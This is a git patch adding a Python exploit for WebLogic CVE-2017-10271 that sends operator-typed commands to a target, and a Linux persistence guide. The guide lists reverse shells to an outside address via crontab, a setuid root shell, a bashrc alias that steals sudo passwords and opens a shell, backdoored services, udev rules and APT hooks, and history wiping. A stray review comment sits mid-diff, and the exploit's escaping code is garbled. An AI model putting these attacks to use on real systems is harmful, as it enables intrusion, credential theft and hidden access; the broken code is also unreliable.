From beb0ce8c5439c8b292747e6a12156c5e9f39a41b Mon Sep 17 00:00:00 2001
From: Swissky
Date: Mon, 3 Sep 2018 18:41:05 +0200
Subject: [PATCH] Linux Persistence + WebLogic RCE
---
 CVE Exploits/WebLogic CVE-2017-10271.py | 61 ++++++++++++
 ...2018-2894.py => WebLogic CVE-2018-2894.py} | 0
 .../Linux - Persistence.md | 96 +++++++++++++++++++
 3 files changed, 157 insertions(+)
 create mode 100644 CVE Exploits/WebLogic CVE-2017-10271.py
 rename CVE Exploits/{Weblogic CVE-2018-2894.py => WebLogic CVE-2018-2894.py} (100%)
 create mode 100644 Methodology and Resources/Linux - Persistence.md
diff --git a/CVE Exploits/WebLogic CVE-2017-10271.py b/CVE Exploits/WebLogic CVE-2017-10271.py
new file mode 100644
index 0000000..9990f95
--- /dev/null
+++ b/CVE Exploits/WebLogic CVE-2017-10271.py
@@ -0,0 +1,61 @@
+import requests
+import sys
+
+url_in = sys.argv[1]
+payload_url = url_in + "/wls-wsat/CoordinatorPortType"
+payload_header = {'content-type': 'text/xml'}
+
+
+def payload_command (command_in):
+ html_escape_table = {
+ "&": "&",
+ '"': """,
+ "'": "'",
+ ">": ">",
+ "<": "<",
+ }
+ command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in)+""
+ payload_1 = " \n" \ " " \ " \n" \ " \n" \ " \n" \ " " \ " " \ " cmd " \ " " \ " " \ " /c " \ " " \ " " \ + command_filtered + \ " " \ " " \ " " \ " " \ " " \ " " \ " " \ " " \ ""
+ return payload_1
+
+def do_post(command_in):
+ result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
+
+ if result.status_code == 500:
+ print "Command Executed \n"
+ else:
+ print "Something Went Wrong \n"
+
+
+
+print "***************************************************** \n" \ "**************** Coded By 1337g ****************** \n" \ "* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \ "***************************************************** \n"
+
+while 1:
+ command_in = raw_input("Eneter your command here: ")
+ if command_in == "exit" : exit(0)
+ do_post(command_in)
diff --git a/CVE Exploits/Weblogic CVE-2018-2894.py b/CVE Exploits/WebLogic CVE-2018-2894.py
similarity index 100%
rename from CVE Exploits/Weblogic CVE-2018-2894.py
rename to CVE Exploits/WebLogic CVE-2018-2894.py
diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md
new file mode 100644
index 0000000..235b180
--- /dev/null
+++ b/Methodology and Resources/Linux - Persistence.md
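Review bot: `html_escape_table` in `payload_command` maps each character to itself (and the `'"': """` entry is not valid Python as shown), so the escaping step is a no-op; this reads like HTML entities lost in transit rather than intent, but the committed file should be diffed against the author's original before it is trusted. The file is Python 2 only (`print` statements, `raw_input`) and says nothing about that or about what it targets; a module docstring such as `"""Blind RCE check for CVE-2017-10271 via /wls-wsat/CoordinatorPortType. Python 2 only (print statement, raw_input). A 500 response is the only signal and does not prove the command ran."""` would save the next reader the guesswork. The same weak-signal caveat belongs as a comment on the `status_code == 500` branch in `do_post`, and `requests.post` there has no `timeout=`, so the `while 1` loop hangs forever on an unresponsive host.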
@@ -0,0 +1,96 @@
+# Linux - Persistence
+
+## Basic reverse shell
+
+```bash
+ncat --udp -lvp 4242
+ncat --sctp -lvp 4242
+ncat --tcp -lvp 4242
+```
+
+## Suid Binary
+
+```powershell
+TMPDIR2="/var/tmp"
+echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
+gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
+rm $TMPDIR2/croissant.c
+chown root:root $TMPDIR2/croissant
+chmod 4777 $TMPDIR2/croissant
+```
+
+## Crontab (Reverse shell to 192.168.1.2 on port 4242)
+
+```bash
+(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
+```
+
+## Backdooring an user's bash_rc (FR/EN Version)
+
+```bash
+TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
+cat << EOF > /tmp/$TMPNAME2
+ alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
+EOF
+if [ -f ~/.bashrc ]; then
+ cat /tmp/$TMPNAME2 >> ~/.bashrc
+fi
+if [ -f ~/.zshrc ]; then
+ cat /tmp/$TMPNAME2 >> ~/.zshrc
+fi
+rm /tmp/$TMPNAME2
+```
+
+
+## Backdooring a startup service
+
+```bash
+RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
+sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
+```
+
+## Backdooring a driver
+
+```bash
+echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null
+```
+
+## Backdooring the APT
+
+If you can create a file on the apt.conf.d directory with: `APT::Update::Pre-Invoke {"CMD"};`
+Next time "apt-get update" is done, your CMD will be executed!
+
+```bash
+echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
+```
+
+## Tips
+
+Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
+
+```bash
+## Do not remove. Generated from /etc/issue.conf by configure.
+```
+
+Clear the last line of the history.
+
+```bash
+history -d $(history | tail -2 | awk '{print $1}') 2> /dev/null
+```
+
+The following directories are temporary and usually writeable
+
+```bash
+/var/tmp/
+/tmp/
+/dev/shm/
+```
+
+
+## Thanks to
+
+* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
+* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)
+* [http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html](http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html)
+* [http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/](http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/)
+* [Pouki from JDI](#no_source_code)
\ No newline at end of file